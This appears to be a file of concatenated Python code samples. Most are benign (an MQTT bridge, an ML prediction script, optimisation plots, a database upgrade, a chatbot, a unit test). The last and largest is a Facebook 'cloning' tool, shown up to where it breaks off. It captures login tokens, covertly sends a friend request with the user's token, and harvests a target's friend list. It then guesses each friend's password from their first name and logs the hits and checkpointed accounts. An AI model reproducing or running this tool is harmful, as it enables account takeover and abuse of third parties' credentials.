_message(mqttserver.from_indi_topic + "/" + mqtt_id, mqtt_client, f"Connection refused on {indiserver.host}:{indiserver.port}, re-trying...")
sleep(5)
except asyncio.IncompleteReadError:
_message(mqttserver.from_indi_topic + "/" + mqtt_id, mqtt_client, f"Connection failed on {indiserver.host}:{indiserver.port}, re-trying...")
sleep(5)
else:
loop.close()
break
def _message(topic, mqtt_client, message):
"Print and send a message to mqtt, as if a message had been received from indiserver"
try:
print(message)
sendmessage = ET.Element('message')
sendmessage.set("message", message)
sendmessage.set("timestamp", datetime.utcnow().isoformat(timespec='seconds'))
_sendtomqtt(ET.tostring(sendmessage), topic, mqtt_client)
except Exception:
pass
return
def _remove(root, userdata):
"A delProperty is received or being sent, remove this device/property from snooping records"
if root.tag != "delProperty":
return
devicename = root.get("device")
if not devicename:
return
propertyname = root.get("name")
if propertyname:
sendsnoopproperties = userdata["sendsnoopproperties"]
if (devicename,propertyname) in sendsnoopproperties:
del sendsnoopproperties[devicename,propertyname]
return
# devicename only
if devicename in userdata['deviceset']:
userdata['deviceset'].remove(devicename)
sendsnoopdevices = userdata["sendsnoopdevices"]
if devicename in sendsnoopdevices:
del sendsnoopdevices[devicename]
| StarcoderdataPython |
155701 | from examples.wmt_2020.common.util.download import download_from_google_drive
from examples.wmt_2020.ro_en.transformer_nmt_config import MODEL_TYPE, transformer_nmt_config, DRIVE_FILE_ID, \
MODEL_NAME, GOOGLE_DRIVE, TEMP_DIRECTORY, RESULT_FILE
from transquest.algo.transformers.run_model import QuestModel
import torch
import tarfile
import urllib.request
import os
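# Downloads a TransQuest QE model and the WMT20 ro-en training data, scores the first 1M sentence pairs,
# and writes the predictions to RESULT_FILE.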
if not os.path.exists(TEMP_DIRECTORY):
    os.makedirs(TEMP_DIRECTORY)
if GOOGLE_DRIVE:
    download_from_google_drive(DRIVE_FILE_ID, MODEL_NAME)
urllib.request.urlretrieve("https://www.quest.dcs.shef.ac.uk/wmt20_files_qe/training_ro-en.tar.gz", "training_ro-en.tar.gz")
model = QuestModel(MODEL_TYPE, MODEL_NAME, num_labels=1, use_cuda=torch.cuda.is_available(),
                   args=transformer_nmt_config)
tar = tarfile.open("training_ro-en.tar.gz", "r:gz")
tar.extractall()
tar.close()
with open('train.roen.ro') as f:
    romanian_lines = f.read().splitlines()
with open('train.roen.en') as f:
    english_lines = f.read().splitlines()
nmt_sentence_pairs = list(map(list, zip(romanian_lines[0:1000000], english_lines[0:1000000])))
predictions, raw_outputs = model.predict(nmt_sentence_pairs)
with open(os.path.join(TEMP_DIRECTORY, RESULT_FILE), "w") as f:
    for s in predictions:
        f.write(str(s) + "\n")
| StarcoderdataPython |
3234494 | import numpy as np
import matplotlib
# matplotlib.use('module://matplotlib-backend-kitty')
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from zoo import Zoo
from sa import simulated_annealing
objectives = [Zoo().get('branin').make_explicit(),
Zoo().get('goldstein_price').make_explicit()]
NUM_RUNS = 4
GAMMA = 0.01
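# For each test objective: run simulated annealing NUM_RUNS+1 times, smooth the visited points with an
# exponential moving average (weight GAMMA), and save a contour plot of the paths plus a temperature plot.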
for obj in objectives:
    f, grad = obj.f, obj.grad
    domain, plt_domain = np.array(obj.domain), np.array(obj.domain_plot)
    DOM_DIM = 2
    L0 = 10
    L = DOM_DIM * L0
    DELTA = 0.1
    EPS = 1e-4
    CHI = 0.9
    SMOOTHING = 0.01
    T = 0.1
    def callback(iteration, x, chain, c):
        x_hist.extend(chain)
        c_hist.append(c)
    xlim = plt_domain[:, 0]
    ylim = plt_domain[:, 1]
    n_samples = 200
    x_plt, y_plt = np.linspace(*xlim, n_samples), np.linspace(*ylim, n_samples)
    mx, my = np.meshgrid(x_plt, y_plt)
    z = np.power(f([mx, my]), 0.1)
    fig, ax = plt.subplots(1, 1)
    ax.contourf(x_plt, y_plt, z, levels=50, cmap='viridis')
    colors = plt.cm.twilight(np.linspace(0, 1, NUM_RUNS + 1))
    temps = list()
    for idx_run in range(NUM_RUNS + 1):
        c_hist = list()
        x_hist = list()
        res = simulated_annealing(f,
                                  grad,
                                  domain=domain,
                                  l0=L0,
                                  delta=DELTA,
                                  stop_eps=EPS,
                                  chi=CHI,
                                  smoothing=SMOOTHING,
                                  descent_affinity=T,
                                  callback=callback)
        x_smooth = res[0]
        x_smooth_hist = [x_smooth, ]
        temps.append(c_hist)
        for x_i in reversed(x_hist):
            x_smooth = GAMMA * x_i + (1. - GAMMA) * x_smooth
            x_smooth_hist.append(x_smooth)
        ax.scatter([res[0][0], ], [res[0][1], ], c=np.array(colors[idx_run]).reshape((1, 4)))
        ax.plot(*tuple(zip(*x_smooth_hist)), color=colors[idx_run], linewidth=0.6)
    ax.set_xlabel(r'$x_1$')
    ax.set_ylabel(r'$x_2$')
    fig.savefig(f'figures/fig51-{obj.name}.pdf', dpi=200)
    fig, ax = plt.subplots(1, 1)
    for c_hist in temps:
        ax.plot(np.arange(len(c_hist)), c_hist)
    ax.set_xlabel(r'Iteration $n$')
    ax.set_ylabel(r'Temperature $c^{(n)}$')
    fig.savefig(f'figures/fig52-{obj.name}.pdf', dpi=200)
| StarcoderdataPython |
1725659 | <reponame>nursix/STL
# -*- coding: utf-8 -*-
#
# Database upgrade script
#
# STL Template Version 2.1.3 => 2.1.4
#
# Execute in web2py folder after code upgrade like:
# python web2py.py -S eden -M -R applications/eden/modules/templates/STL/upgrade/2.1.3-2.1.4.py
#
#import datetime
import sys
#from s3 import S3DateTime
#from gluon.storage import Storage
#from gluon.tools import callback
# Override auth (disables all permission checks)
auth.override = True
# Failed-flag
failed = False
# Info
def info(msg):
    print >> sys.stderr, msg,
def infoln(msg):
    print >> sys.stderr, msg
# Load models for tables
atable = s3db.dvr_activity
utable = auth.settings.table_user
otable = s3db.org_organisation
IMPORT_XSLT_FOLDER = os.path.join(request.folder, "static", "formats", "s3csv")
TEMPLATE_FOLDER = os.path.join(request.folder, "modules", "templates", "STL")
# -----------------------------------------------------------------------------
if not failed:
    info("Set owner organizations for group activities")
    left = (utable.on(utable.id == atable.owned_by_user),
            otable.on(otable.id == utable.organisation_id),
            )
    query = (atable.deleted == False)
    rows = db(query).select(atable.id,
                            otable.id,
                            otable.pe_id,
                            left = left,
                            )
    updated = 0
    for row in rows:
        organisation_id = row.org_organisation.id
        if (organisation_id):
            query = (atable.id == row.dvr_activity.id)
            try:
                success = db(query).update(organisation_id = organisation_id,
                                           realm_entity = row.org_organisation.pe_id,
                                           )
            except:
                pass
            if success:
                updated += 1
    infoln("...done (%s records updated)" % updated)
# -----------------------------------------------------------------------------
if not failed:
    info("Upgrade user roles")
    bi = s3base.S3BulkImporter()
    filename = os.path.join(TEMPLATE_FOLDER, "auth_roles.csv")
    with open(filename, "r") as File:
        try:
            bi.import_role(filename)
        except Exception, e:
            infoln("...failed")
            infoln(sys.exc_info()[1])
            failed = True
        else:
            infoln("...done")
# -----------------------------------------------------------------------------
if not failed:
    info("Hide unused user roles")
    hidden = ("EDITOR", "MAP_ADMIN", "ORG_GROUP_ADMIN")
    query = s3db.auth_group.uuid.belongs(hidden)
    try:
        db(query).update(hidden=True)
    except:
        infoln("...failed")
        infoln(sys.exc_info()[1])
        failed = True
    else:
        infoln("...done")
# -----------------------------------------------------------------------------
# Finishing up
#
if failed:
    db.rollback()
    print >> sys.stderr, "UPGRADE FAILED - Action rolled back."
else:
    db.commit()
    print >> sys.stderr, "UPGRADE SUCCESSFUL."
| StarcoderdataPython |
4820031 | import aiml
import sys
from bottle import run
from bottle import route
from bottle import request
from bottle import redirect
from random import choice
from lib.views import index
from lib.views import Response
botbrain = aiml.Kernel()
botbrain.learn('brain/yulan.aiml')
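# Minimal Bottle front end: '/' renders the index page, '/answer' feeds the POSTed question to the AIML kernel.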
@route('/')
def RenderIndex():
    return index()
@route('/answer', method='POST')
def ResponseAnswer():
    ask = request.forms.get('ask')
    if ask:
        questions.append(ask)
        try:
            ans = botbrain.respond(ask)
        except:
            ans = choice(default_excuses)
        ask_template = '<p> you just asked: {} </p>'.format(ask)
        respond_template = '<p> her answer: {} </p>'.format(ans)
        return ask_template, respond_template
        redirect('http://localhost:8080/hello')
    return "You asked nothing!"
run(host='localhost', port=sys.argv[1], debug=True)
| StarcoderdataPython |
3337009 | # -*- coding: utf-8 -*-
import unittest
import ddt
import cefp
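# Table-driven tests: ddt loads cases from test_cefp.json; dict expectations are compared directly,
# string expectations name a builtin exception that parse() should raise.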
@ddt.ddt
class TestCEF(unittest.TestCase):
    @ddt.file_data('test_cefp.json')
    def test_parse(self, input, expected):
        if isinstance(expected, dict):
            self.assertEqual(cefp.parse(input), expected)
        else:
            self.assertRaises(__builtins__[expected], cefp.parse, input)
| StarcoderdataPython |
81881 | #coding=utf-8
########################################
# <NAME>
# Cloning update 2020
########################################
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(100000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 paceusa.py')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Selamat Tinggal Asw '
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.001)
#### colours ####
B='\033[1;94m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'
#Dev:Anonymous Pace Usa
#### LOGO ####
print """
\033[1;96m
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░████░░████░░░░░░░░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░████▄▄████░░░████░░░░░░░
░░░░░░░░██████████░░░████░░░░░░░
░░░░░░░░████▀▀████░░░████░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░"""
print "\033[1;93m⊱⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⊰"
jalan("\033[1;93m███████▓█████▓▓╬╬╬╬╬╬╬╬▓███▓╬╬╬╬╬╬╬▓╬╬▓█ ")
jalan("\033[1;93m████▓▓▓▓╬╬▓█████╬╬╬╬╬╬███▓╬╬╬╬╬╬╬╬╬╬╬╬╬█ ")
jalan("\033[1;93m███▓▓▓▓╬╬╬╬╬╬▓██╬╬╬╬╬╬▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m████▓▓▓╬╬╬╬╬╬╬▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m███▓█▓███████▓▓███▓╬╬╬╬╬╬▓███████▓╬╬╬╬▓█ ")
jalan("\033[1;93m████████████████▓█▓╬╬╬╬╬▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬█ ")
jalan("\033[1;93m███▓▓▓▓▓▓▓╬╬▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m████▓▓▓╬╬╬╬▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m███▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m█████▓▓▓▓▓▓▓▓█▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m█████▓▓▓▓▓▓▓██▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ")
jalan("\033[1;93m█████▓▓▓▓▓████▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ")
jalan("\033[1;93m████▓█▓▓▓▓██▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ")
jalan("\033[1;93m████▓▓███▓▓▓▓▓▓▓██▓╬╬╬╬╬╬╬╬╬╬╬╬█▓╬▓╬╬▓██ ")
jalan("\033[1;93m█████▓███▓▓▓▓▓▓▓▓████▓▓╬╬╬╬╬╬╬█▓╬╬╬╬╬▓██ ")
jalan("\033[1;93m█████▓▓█▓███▓▓▓████╬▓█▓▓╬╬╬▓▓█▓╬╬╬╬╬╬███ ")
jalan("\033[1;93m██████▓██▓███████▓╬╬╬▓▓╬▓▓██▓╬╬╬╬╬╬╬▓███ ")
jalan("\033[1;93m███████▓██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬████ ")
jalan("\033[1;93m███████▓▓██▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓████ ")
jalan("\033[1;93m████████▓▓▓█████▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█████ ")
jalan("\033[1;93m█████████▓▓▓█▓▓▓▓▓███▓╬╬╬╬╬╬╬╬╬╬╬▓██████ ")
jalan("\033[1;93m██████████▓▓▓█▓▓▓╬▓██╬╬╬╬╬╬╬╬╬╬╬▓███████ ")
jalan("\033[1;93m███████████▓▓█▓▓▓▓███▓╬╬╬╬╬╬╬╬╬▓████████ ")
jalan("\033[1;93m██████████████▓▓▓███▓▓╬╬╬╬╬╬╬╬██████████ ")
jalan("\033[1;93m███████████████▓▓▓██▓▓╬╬╬╬╬╬▓███████████")
print "\033[1;93m⊱⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⊰"
logo = """
\033[1;91m ▒▒▒▒▒▒▒▒▒▒▒▄▄▄▄░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒▒▒▒▒▒▄██████▒▒▒▒▒▄▄▄█▄▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒▒▒▒▄██▀░░▀██▄▒▒▒▒████████▄▒▒▒▒▒▒
\033[1;91m ▒▒▒▒▒▒███░░░░░░██▒▒▒▒▒▒█▀▀▀▀▀██▄▄▒▒▒
\033[1;91m ▒▒▒▒▒▄██▌░░░░░░░██▒▒▒▒▐▌▒▒▒▒▒▒▒▒▀█▄▒
\033[1;91m ▒▒▒▒▒███░░▐█░█▌░██▒▒▒▒█▌▒▒▒▒▒▒▒▒▒▒▀▌
\033[1;91m ▒▒▒▒████░▐█▌░▐█▌██▒▒▒██▒▒▒▒▒▒▒▒▒▒▒▒▒ \033[1;93m
\033[1;91m ▒▒▒▐████░▐░░░░░▌██▒▒▒█▌▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒████░░░▄█░░░██▒▒▐█▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒████░░░██░░██▌▒▒█▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒████▌░▐█░░███▒▒▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒▐████░░▌░███▒▒▒██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ▒▒▒▒▒████░░░███▒▒▒▒█▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ▒▒▒██████▌░████▒▒▒██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ▒▐████████████▒▒███▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ▒█████████████▄████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ██████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ██████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m █████████████████▀▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m █████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m╔═══════════════════════════════════════╗
\033[1;97m║\033[1;93m* \033[1;97mAUTHOR \033[1;91m: \033[1;96mPaceUsa \033[1;97m ║
\033[1;97m║\033[1;93m* \033[1;97mGITHUB \033[1;91m: \033[1;92mhttps://github.com/Ahmadchen\033[1;97m║
\033[1;97m║\033[1;93m* \033[1;97mFB \033[1;91m: \033[1;92mPACEUSA GANS ID Squad. \033[1;97m ║
\033[1;97m╚═══════════════════════════════════════╝
\033[1;96m⊱══════════⊱═⊰Anonymous Wibu⊱══════════⊱═⊰
"""
CorrectUsername = "PaceUsa"
CorrectPassword = "<PASSWORD>"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;97mKETIK PaceUsa \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;97mKETIK AnonymousID \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Salah Tolol! Ketik AnonymousID"
os.system('xdg-open https://www.t.me/cardingtutorialfreeindonesia')
else:
print "Salah Tolol! Ketik PaceUsa"
os.system('xdg-open https://www.facebook.com/cicicyber.squadindo.7')
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mMohon Tunggu \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
back = 0
threads = []
sucessful = []
checkpoint = []
oks = []
action_failed = []
idfriends = []
idfromfriends = []
member_id = []
email= []
number = []
id = []
em = []
email_from_friends = []
hp = []
hpfromfriends = []
reaction = []
reactiongroup = []
comment = []
group_comment = []
listgroup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo
jalan("\033[1;97m⊱⋕⊰══════════════════════════════════════⊱⋕⊰")
print "\033[1;91m>>>\033[1;91m[1]\033[1;92m Cloning Semua Negara \033[1;91m(\033[1;97mTanpa Fb login\033[1;91m) "
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[2]\033[1;94m Login Pakai Facebook "
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[3]\033[1;92m Login Pakai Akses token "
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[4]\033[1;94m Unduh Akses token"
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[5]\033[1;92m Ikuti Fb Saya"
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[6]\033[1;94m Follow Ig Saya"
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[0]\033[1;96m Keluar "
jalan("\033[1;97m⊱⋕⊰══════════════════════════════════════⊱⋕⊰")
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;92mPilih Nomer═╬══►\033[1;95m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_login()
elif peak =="1":
menu()
elif peak =="2":
login1()
elif peak =="3":
tokenz()
elif peak =="4":
os.system('xdg-open https://play.google.com/store/apps/details?id=com.proit.thaison.getaccesstokenfacebook')
login()
elif peak =="5":
os.system('xdg-open https://www.facebook.com/cicicyber.squadindo.7')
login()
elif peak =="6":
os.system('xdg-open https://Instagram.com/cyber_mrlinkerrorsystemoffical')
login()
elif unikers =="0":
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def login1():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
time.sleep(0.05)
print logo
jalan("\033[1;96m⊱⋕⊰══════════════════════════════════════⊱⋕⊰")
jalan('\033[1;96m[✾]\x1b[1;91mJANGAN GUNAKAN AKUN OLD UNTUK LOGIN\x1b[1;96m[✾]' )
jalan('\033[1;96m[✾]\x1b[1;91mGUNAKAN AKUN BARU BUAT/LOGIN FIA TOKEN\x1b[1;96m[✾]' )
id = raw_input('\033[1;96m[!!] \x1b[0;34mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[!!] \x1b[0;34mPassword \x1b[1;91m: \x1b[1;92m')
jalan("\033[1;96m⊱⋕⊰══════════════════════════════════════⊱⋕⊰")
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;97mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = <PASSWORD>
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"<KEY>","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":<PASSWORD>,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
jalan( '\n\x1b[1;95mLogin Successful...')
os.system('xdg-open https://www.facebook.com/cicicyber.squadindo.7')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;97mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;97mSepertinya Akun Anda Terkena Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;93mPassword/Email Anda Salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;91m[+]\033[1;92mToken\033[1;91m :\033[1;95mMasukkan tautan token accees tanpa login Fb>> ")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Salah"
e = raw_input("\033[1;91m[?] \033[1;92mAnda Tau token? Kalo Tidak Tau Pm Saya!\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;94mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
o = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(o.text)
nama = a['name']
id = a['id']
t = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(t.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;97mSepertinya Akun Anda Terkena Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;94mThere is no internet connection"
keluar()
os.system("clear")
print logo
jalan( "\033[1;93m⊱⋕⊰═════════════════════════════════════════⊱⋕⊰" )
print " \033[1;36;40m\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m"
print " \033[1;36;40m\033[1;32;40m[*] ID \033[1;32;40m: "+id+" \033[1;36;92m"
print " \033[1;36;40m\033[1;32;40m[*] Subs\033[1;32;40m: "+sub+" \033[1;36;92m"
jalan( "\033[1;93m⊱⋕⊰═════════════════════════════════════════⊱⋕⊰")
print "\033[1;32;98m[1] \033[1;96m>> Mulai Cloning "
print "\033[1;32;98m[0] \033[1;96m>> Keluar"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰\n"
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰\n"
jalan( "\x1b[1;32;92m[1] \033[1;33;98m>> Hack Daftar Teman Publik")
jalan( "\x1b[1;32;36m[0] \033[1;33;96m>> Keluar")
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰\n"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;31;40m>>> \033[1;97m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;96m⊱⋕⊰═══════════════════════════════════════⊱⋕⊰\n"
idt = raw_input("\033[1;96m[⊱⋕⊰]\033[1;93m Enter ID/USERNAME\033[1;91m : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;31;37m[⊱⋕⊰] Name : "+op["name"]
except KeyError:
print"\x1b[1;37m[⊱⋕⊰] ID Not Found!"
raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
super()
print"\033[1;35;37m[⊱⋕⊰] Jangan Dulu Keluar Peler Lagi Proses... "
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;36;96m[⊱⋕⊰] Total ID : \033[1;92m"+str(len(id))
jalan('\033[1;34;96m[⊱⋕⊰] Mohon Tunggu ')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;32;40m[⊱⋕⊰] Cloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;94m ❈ \x1b[1;91mTo Stop Process Press CTRL+Z \033[1;94m ❈"
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰"
def main(arg):
global oks
user = arg
try:
os.mkdir('out')
except OSError:
pass #Dev:Yayan-XD
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
